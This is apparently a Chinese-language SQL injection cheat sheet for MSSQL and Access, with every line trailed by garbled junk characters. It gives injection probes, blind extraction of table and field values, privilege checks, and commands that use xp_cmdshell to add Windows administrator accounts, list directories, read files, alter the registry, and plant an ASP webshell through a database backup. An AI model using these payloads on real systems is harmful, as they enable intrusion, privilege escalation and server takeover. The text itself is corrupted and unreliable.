1.判断是否有注入;and 1=1 ;and 1=2 � Q��=#I9-
2.初步判断是否是mssql ;and user>0 _'!kuE�,*1
m|O1�QM�;T
3.注入参数是字符'and [查询条件] and ''=' /:Lu_)�5 �
&^!h�}D%T/
4.搜索时没过滤参数的'and [查询条件] and '%25'=' bMm3F%FFq&
�xq[Yg15d%
5.判断数据库系统 M:n�6BC>t"
ab.t�H$�:<
;and (select count(*) from sysobjects)>0 mssql �Q���M'X@�
�=lp1��Z�>
;and (select count(*) from msysobjects)>0 access �$S�Y]fNJQ
Elb� aF�br
QR0(,e$Dl�
�jVW�K0Zba
6.猜数据库 ;and (select Count(*) from [数据库名])>0 3^,�QI���G
5M���F#�&v
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 H'DVwnn>ik
Da.G4,vLh�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #�_J���Yh?
A�m"(+>W21
9.(1)猜字段的ascii值(access) [XR$F@�o�
�nh�.3�2q]
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 j:,9%�tg��
$B�����(kZ
(2)猜字段的ascii值(mssql) �d`y�!cu2}
,�Nm�$i"Lg
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 :"1|AJo)�
-i�jC_��`>
10.测试权限结构(mssql) l��\OL�y�Q
�F@YK�Fk+a
�xH��A0gZf
>jg0s)�RA'
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- g>J�L�DQdc
K�> g[�k�_
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Na�{Y}0=^y
ne�Z�.`"LV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- bulS��&dAX
L%"�Ll�S�g
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �2J�GL;�U$
Tr�S�8h^C�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- a_~=#���]a
zeb=8�Dg
:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- h^�UKT`9vt
aB��~S?�.l
;and 1=(select IS_MEMBER('db_owner'));-- (V:E2WR���
AIYmS#V1W2
fW�nD\mx?0
�}_9,w;�M$
11.添加mssql和系统的帐户 W-Hoyn>�?2
� as yZ��e
;exec master.dbo.sp_addlogin username;-- yw�-��8#y
;exec master.dbo.sp_password null,username,password;-- ����E�
H:T
: 18K�R*;p
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- D\d�Wt1�n�
!>��,m&O-x
;exec master.dbo.xp_cmdshell 'net user username password /�P|fB�]�p
Yb3mP!3q8Z
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- RGKYW>$0RR
�S-Y=�-�"�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- nn/?fIZN4
U1_@F$�mq<
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- b��V��+(b9
ygJr=_�iA9
�S{pXs�&4O
zi R5:d3 �
12.(1)遍历目录 m7a#qs;��,
o8/�;��;*�
;create table dirs(paths varchar(100), id int) ��N'r3`8tS
(�wDm*�bZ*
;insert dirs exec master.dbo.xp_dirtree 'c:\'
{�vUN+We�
|8>��3`w!�
;and (select top 1 paths from dirs)>0 ��{;to��I
�CYYkzcc^
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �;<yd^�X�s
{^(AC�S9mL
*f&�EoUk}F
B`*Zs�S=R-
(2)遍历目录 ��+z�X�EYc
jK \T|vGJa
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (py]LB�Z��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7K)��6�^r^
l^�ZI* z7N
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 y�j�fat&$�
rSXh;\MfB4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ���q0f3="
?\C�"YG69T
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }cT_qqw(f%
n��F�6�q7
TIp:F�W�[�
GpZ��c5�c�
13.mssql中的存储过程 �ml�\4x�p,
4�`J�H&))}
xp_regenumvalues 注册表根键, 子键 a��f�Yc\-"
,%\�o4Rc'o
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X�]\ ���\,
PaV-F_2���
xp_regread 根键,子键,键值名 ;&1�V0U,fx
�!\�&�;��h
;exec xp_regread yAo�e51h?
X]P:C���Y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 h�;6lK$�!c
J�,Ks0M��A
xp_regwrite 根键,子键, 值名, 值类型, 值 <.Nx[!'~&d
e{�m2l2Tx:
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �#1>X58I^�
gx��%|P�gd
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 4�:U?���u�
kF/9-[]$g,
xp_regdeletevalue 根键,子键,值名 �[B+W%g(c-
l��P<:tR~K
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 xO-�+i\ ZV
J~#;<e{\"�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6`f2-f9%iq
\Gc+W�pS�(
�tKp�mm`2
�qK)73eNSR
14.mssql的backup创建webshell �%� L�J��s
<:?r�:fQX�
use model &L^+B�Q`O?
V7/I��>^X�
create table cmd(str image); $sE�y�%�-
[�7[�0^�ad
insert into cmd(str) values (''); �/i��X+�R@
�=Q.^c.�sw
backup database model to disk='c:\l.asp'; y��\�a1i�y
�i9/aA�H�0
*hw\35%P`?
>yULC|'F&~
15.mssql内置函数 t^w"w`v\�u
5=f|�7y��l
;and (select @@version)>0 获得Windows的版本号 mya_4��I
m
t25,�0<i�W
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y~F��V2��$
���P'`r���
;and (select user_name())>0 爆当前系统的连接用户 X�HK�70: i
3\B>�l�KhQ
;and (select db_name())>0 得到当前连接的数据库 .�C--gQpIv
/Z$&p��qs!
gXjV?"^kUl
B�ro9YP4<�
16.简洁的webshell q}�]XY�ys
q#s�,-�u�u
use model ~�m�$Y$,uH
s�D=�n95`v
create table cmd(str image); BW���"5�Aj
�a]�M�X�)?
insert into cmd(str) values (''); �ia M�Usa{
tQjL�Ov+?=
backup database model to disk='g:\wwwtest\l.asp';
